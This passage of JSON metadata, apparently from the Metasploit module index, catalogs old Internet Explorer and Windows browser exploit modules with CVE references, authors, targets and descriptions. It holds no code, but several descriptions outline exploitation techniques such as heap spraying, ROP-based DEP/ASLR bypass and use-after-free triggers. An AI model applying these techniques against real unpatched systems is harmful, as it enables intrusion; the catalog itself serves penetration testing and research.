"type": "exploit",
"author": [
"Unknown",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability in the Internet Explorer\n Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n Explorer are vulnerable.\n\n By specifying a long value as the \"DataURL\" parameter to this control, it is possible\n to write a NUL byte outside the bounds of an array. By targeting control flow data\n on the stack, an attacker can execute arbitrary code.",
"references": [
"CVE-2010-0805",
"OSVDB-63329",
"BID-39025",
"ZDI-10-034",
"MSB-MS10-018"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_018_ie_tabular_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_022_ie_vbscript_winhlp32": {
"name": "MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution",
"full_name": "exploit/windows/browser/ms10_022_ie_vbscript_winhlp32",
"rank": 500,
"disclosure_date": "2010-02-26",
"type": "exploit",
"author": [
"Maurycy Prodeus",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a code execution vulnerability that occurs when a user\n presses F1 on MessageBox originated from VBscript within a web page. When the\n user hits F1, the MessageBox help functionality will attempt to load and use\n a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n This particular version of the exploit implements a WebDAV server that will\n serve HLP file as well as a payload EXE. During testing warnings about the\n payload EXE being unsigned were witnessed. A future version of this module\n might use other methods that do not create such a warning.",
"references": [
"CVE-2010-0483",
"OSVDB-62632",
"MSB-MS10-023",
"URL-http://www.microsoft.com/technet/security/advisory/981169.mspx",
"URL-http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx",
"URL-http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer on Windows"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_026_avi_nsamplespersec": {
"name": "MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",
"full_name": "exploit/windows/browser/ms10_026_avi_nsamplespersec",
"rank": 300,
"disclosure_date": "2010-04-13",
"type": "exploit",
"author": [
"Yamata Li",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Jordi Sanchez <jsanchez@0x01000000.org>"
],
"description": "This module exploits a buffer overflow in l3codecx.ax while processing a\n AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite\n with 0's so the three least significant bytes of EIP saved on stack are\n overwritten and shellcode is mapped using the .NET DLL memory technique pioneered\n by Alexander Sotirov and Mark Dowd.\n\n Please note on IE 8 targets, your malicious URL must be a trusted site in order\n to load the .Net control.",
"references": [
"CVE-2010-0480",
"OSVDB-63749",
"BID-39303",
"MSB-MS10-026",
"URL-https://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/",
"URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 Automatic"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_026_avi_nsamplespersec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_042_helpctr_xss_cmd_exec": {
"name": "Microsoft Help Center XSS and Command Execution",
"full_name": "exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec",
"rank": 600,
"disclosure_date": "2010-06-09",
"type": "exploit",
"author": [
"Tavis Ormandy",
"natron <natron@metasploit.com>"
],
"description": "Help and Support Center is the default application provided to access online\n documentation for Microsoft Windows. Microsoft supports accessing help documents\n directly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n an error in validation of input to hcp:// combined with a local cross site\n scripting vulnerability and a specialized mechanism to launch the XSS trigger,\n arbitrary command execution can be achieved.\n\n On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n can be used to launch the exploit automatically. If IE8 and WMP11, either can\n be used to launch the attack, but both pop dialog boxes asking the user if\n execution should continue. This exploit detects if non-intrusive mechanisms are\n available and will use one if possible. In the case of both IE8 and WMP11, the\n exploit defaults to using an iframe on IE8, but is configurable by setting the\n DIALOGMECH option to \"none\" or \"player\".\n\n This module creates a WebDAV service from which the payload is copied to the\n victim machine.",
"references": [
"CVE-2010-1885",
"OSVDB-65264",
"URL-http://www.microsoft.com/technet/security/advisory/2219475.mspx",
"MSB-MS10-042"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_046_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/browser/ms10_046_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"B_H"
],
"description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This module creates a WebDAV service that can be used\n to run an arbitrary payload when accessed as a UNC path.",
"references": [
"CVE-2010-2568",
"OSVDB-66387",
"MSB-MS10-046",
"URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms10_090_ie_css_clip": {
"name": "MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption",
"full_name": "exploit/windows/browser/ms10_090_ie_css_clip",
"rank": 400,
"disclosure_date": "2010-11-03",
"type": "exploit",
"author": [
"unknown",
"Yuange",
"Matteo Memelli",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability within Microsoft's\n HTML engine (mshtml). When parsing an HTML page containing a specially\n crafted CSS tag, memory corruption occurs that can lead arbitrary code\n execution.\n\n It seems like Microsoft code inadvertently increments a vtable pointer to\n point to an unaligned address within the vtable's function pointers. This\n leads to the program counter being set to the address determined by the\n address \"[vtable+0x30+1]\". The particular address depends on the exact\n version of the mshtml library in use.\n\n Since the address depends on the version of mshtml, some versions may not\n be exploitable. Specifically, those ending up with a program counter value\n within another module, in kernel space, or just not able to be reached with\n various memory spraying techniques.\n\n Also, since the address is not controllable, it is unlikely to be possible\n to use ROP to bypass non-executable memory protections.",
"references": [
"CVE-2010-3962",
"OSVDB-68987",
"BID-44536",
"URL-http://www.microsoft.com/technet/security/advisory/2458511.mspx",
"EDB-15421",
"MSB-MS10-090"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Debug",
"Internet Explorer 6",
"Internet Explorer 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms10_090_ie_css_clip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_003_ie_css_import": {
"name": "MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free",
"full_name": "exploit/windows/browser/ms11_003_ie_css_import",
"rank": 400,
"disclosure_date": "2010-11-29",
"type": "exploit",
"author": [
"passerby",
"d0c_s4vage",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory corruption vulnerability within Microsoft\\'s\n HTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n import, a C++ object is deleted and later reused. This leads to arbitrary\n code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions with .NET 2.0.50727 installed.",
"references": [
"CVE-2010-3971",
"OSVDB-69796",
"BID-45246",
"URL-http://www.microsoft.com/technet/security/advisory/2488013.mspx",
"URL-http://www.wooyun.org/bugs/wooyun-2010-0885",
"URL-https://seclists.org/fulldisclosure/2010/Dec/110",
"MSB-MS11-003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 8",
"Internet Explorer 7",
"Internet Explorer 6",
"Debug Target (Crash)"
],
"mod_time": "2018-10-02 15:57:57 +0000",
"path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_003_ie_css_import",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_050_mshtml_cobjectelement": {
"name": "MS11-050 IE mshtml!CObjectElement Use After Free",
"full_name": "exploit/windows/browser/ms11_050_mshtml_cobjectelement",
"rank": 300,
"disclosure_date": "2011-06-16",
"type": "exploit",
"author": [
"d0c_s4vage",
"sinn3r <sinn3r@metasploit.com>",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability in Internet Explorer. The\n vulnerability occurs when an invalid <object> tag exists and other elements\n overlap/cover where the object tag should be when rendered (due to their\n styles/positioning). The mshtml!CObjectElement is then freed from memory because\n it is invalid. However, the mshtml!CDisplay object for the page continues to keep\n a reference to the freed <object> and attempts to call a function on it, leading\n to the use-after-free.\n\n Please note that for IE 8 targets, JRE (Java Runtime Environment) is required\n to bypass DEP (Data Execution Prevention).",
"references": [
"CVE-2011-1260",
"OSVDB-72950",
"MSB-MS11-050",
"URL-http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 7 on XP SP3",
"Internet Explorer 7 on Windows Vista",
"Internet Explorer 8 on XP SP3",
"Internet Explorer 8 on Windows 7",
"Debug Target (Crash)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_050_mshtml_cobjectelement",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_081_option": {
"name": "MS11-081 Microsoft Internet Explorer Option Element Use-After-Free",
"full_name": "exploit/windows/browser/ms11_081_option",
"rank": 300,
"disclosure_date": "2012-10-11",
"type": "exploit",
"author": [
"Ivan Fratric",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Microsoft Internet Explorer. A memory\n corruption may occur when the Option cache isn't updated properly, which allows\n other JavaScript methods to access a deleted Option element, and results in code\n execution under the context of the user.",
"references": [
"CVE-2011-1996",
"OSVDB-76208",
"MSB-MS11-081",
"URL-http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html",
"URL-http://pastebin.com/YLH725Aj"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_081_option.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_081_option",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms11_093_ole32": {
"name": "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution",
"full_name": "exploit/windows/browser/ms11_093_ole32",
"rank": 300,
"disclosure_date": "2011-12-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a type confusion vulnerability in the OLE32 component of\n Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple\n function.\n\n A Visio document with a specially crafted Summary Information Stream embedded allows\n to get remote code execution through Internet Explorer, on systems with Visio Viewer\n installed.",
"references": [
"MSB-MS11-093",
"CVE-2011-3400",
"OSVDB-77663",
"BID-50977",
"URL-http://aluigi.org/adv/ole32_1-adv.txt",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3 / Visio Viewer 2010",
"IE 7 on Windows XP SP3 / Visio Viewer 2010"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms11_093_ole32.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms11_093_ole32",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_004_midi": {
"name": "MS12-004 midiOutPlayNextPolyEvent Heap Overflow",
"full_name": "exploit/windows/browser/ms12_004_midi",
"rank": 300,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"Shane Garrett",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a heap overflow vulnerability in the Windows Multimedia\n Library (winmm.dll). The vulnerability occurs when parsing specially crafted\n MIDI files. Remote code execution can be achieved by using the Windows Media Player\n ActiveX control.\n\n Exploitation is done by supplying a specially crafted MIDI file with\n specific events, causing the offset calculation being higher than what is\n available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing\n us to either \"inc al\" or \"dec al\" a byte. This can be used to corrupt an array\n (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,\n which leverages remote code execution under the context of the user.\n\n Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,\n if you know your target's patch level, you may also try the 'MSHTML' advanced\n option for an info leak based attack. Currently, this module only supports two\n MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.\n Or 8.0.6001.19120, which is patch level before the MS12-004 fix.\n\n Also, based on our testing, the vulnerability does not seem to trigger when\n the victim machine is operated via rdesktop.",
"references": [
"MSB-MS12-004",
"CVE-2012-0003",
"OSVDB-78210",
"BID-51292"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_004_midi.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_004_midi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_037_ie_colspan": {
"name": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow",
"full_name": "exploit/windows/browser/ms12_037_ie_colspan",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Alexandre Pelletier",
"mr_me <steventhomasseeley@gmail.com>",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.",
"references": [
"CVE-2012-1876",
"OSVDB-82866",
"BID-53848",
"MSB-MS12-037"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_037_ie_colspan.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_037_ie_colspan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms12_037_same_id": {
"name": "MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption",
"full_name": "exploit/windows/browser/ms12_037_same_id",
"rank": 300,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"Dark Son",
"Unknown",
"Yichong Lin",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption flaw in Internet Explorer 8 when\n handling objects with the same ID property. At the moment this module targets\n IE8 over Windows XP SP3 and Windows 7. This module supports heap massaging\n as well as the heap spray method seen in the wild (Java msvcrt71.dll).",
"references": [
"MSB-MS12-037",
"CVE-2012-1875",
"OSVDB-82865",
"URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
"URL-https://twitter.com/binjo/status/212795802974830592",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3 with msvcrt ROP",
"IE 8 on Windows XP SP3 with JRE ROP",
"IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms12_037_same_id",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_009_ie_slayoutrun_uaf": {
"name": "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",
"full_name": "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
"rank": 200,
"disclosure_date": "2013-02-13",
"type": "exploit",
"author": [
"Scott Bell <scott.bell@security-assessment.com>"
],
"description": "This module exploits a use-after-free vulnerability in Microsoft Internet Explorer\n where a CParaElement node is released but a reference is still kept\n in CDoc. This memory is reused when a CDoc relayout is performed.",
"references": [
"CVE-2013-0025",
"OSVDB-90122",
"MSB-MS13-009",
"URL-http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_009_ie_slayoutrun_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_022_silverlight_script_object": {
"name": "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
"full_name": "exploit/windows/browser/ms13_022_silverlight_script_object",
"rank": 300,
"disclosure_date": "2013-03-12",
"type": "exploit",
"author": [
"James Forshaw",
"Vitaliy Toropov",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on\n the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an\n unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible\n to dereference arbitrary memory which easily leverages to arbitrary code execution. In order\n to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class\n from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP\n SP3 / Windows 7 SP1.",
"references": [
"CVE-2013-0074",
"CVE-2013-3896",
"OSVDB-91147",
"OSVDB-98223",
"BID-58327",
"BID-62793",
"MSB-MS13-022",
"MSB-MS13-087",
"PACKETSTORM-123731"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86/x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_022_silverlight_script_object",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_037_svg_dashstyle": {
"name": "MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow",
"full_name": "exploit/windows/browser/ms13_037_svg_dashstyle",
"rank": 300,
"disclosure_date": "2013-03-06",
"type": "exploit",
"author": [
"Nicolas Joly",
"4B5F5F4B",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability on Internet Explorer.\n The vulnerability exists in the handling of the dashstyle.array length for vml\n shapes on the vgx.dll module.\n\n The exploit has been built and tested specifically against Windows 7 SP1 with\n Internet Explorer 8. It uses either JRE6 or an information leak (to ntdll) to\n bypass ASLR, and by default the info leak is used. To make sure the leak is\n successful, the ntdll version should be either v6.1.7601.17514 (the default dll\n version on a newly installed/unpatched Windows 7 SP1), or ntdll.dll v6.1.7601.17725\n (installed after apply MS12-001). If the target doesn't have the version the exploit\n wants, it will refuse to attack by sending a fake 404 message (webpage not found).\n\n If you wish to try the JRE6 component instead to bypass ASLR, you can set the\n advanced datastore option to 'JRE6'. If JRE6 is chosen but the target doesn't\n have this particular component, the exploit will also refuse to attack by\n sending a 404 message.",
"references": [
"CVE-2013-2551",
"OSVDB-91197",
"BID-58570",
"MSB-MS13-037",
"URL-http://binvul.com/viewthread.php?tid=311"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_037_svg_dashstyle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_055_canchor": {
"name": "MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free",
"full_name": "exploit/windows/browser/ms13_055_canchor",
"rank": 300,
"disclosure_date": "2013-07-09",
"type": "exploit",
"author": [
"Jose Antonio Vazquez Gonzalez",
"Orange Tsai",
"Peter Vreugdenhil",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "In IE8 standards mode, it's possible to cause a use-after-free condition by first\n creating an illogical table tree, where a CPhraseElement comes after CTableRow,\n with the final node being a sub table element. When the CPhraseElement's outer\n content is reset by using either outerText or outerHTML through an event handler,\n this triggers a free of its child element (in this case, a CAnchorElement, but\n some other objects apply too), but a reference is still kept in function\n SRunPointer::SpanQualifier. This function will then pass on the invalid reference\n to the next functions, eventually used in mshtml!CElement::Doc when it's trying to\n make a call to the object's SecurityContext virtual function at offset +0x70, which\n results a crash. An attacker can take advantage of this by first creating an\n CAnchorElement object, let it free, and then replace the freed memory with another\n fake object. Successfully doing so may allow arbitrary code execution under the\n context of the user.\n\n This bug is specific to Internet Explorer 8 only. It was originally discovered by\n Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.",
"references": [
"CVE-2013-3163",
"OSVDB-94981",
"MSB-MS13-055",
"URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_055_canchor.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_055_canchor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_059_cflatmarkuppointer": {
"name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
"full_name": "exploit/windows/browser/ms13_059_cflatmarkuppointer",
"rank": 300,
"disclosure_date": "2013-06-27",
"type": "exploit",
"author": [
"corelanc0d3r",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.",
"references": [
"CVE-2013-3184",
"OSVDB-96182",
"MSB-MS13-059",
"BID-61668",
"ZDI-13-194",
"ZDI-13-195"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_059_cflatmarkuppointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_069_caret": {
"name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",
"full_name": "exploit/windows/browser/ms13_069_caret",
"rank": 300,
"disclosure_date": "2013-09-10",
"type": "exploit",
"author": [
"corelanc0d3r",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. Precise control of\n the freed object allows arbitrary code execution under the context of the user.",
"references": [
"CVE-2013-3205",
"OSVDB-97094",
"MSB-MS13-069",
"ZDI-13-217"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_069_caret.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_069_caret",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_080_cdisplaypointer": {
"name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
"full_name": "exploit/windows/browser/ms13_080_cdisplaypointer",
"rank": 300,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.",
"references": [
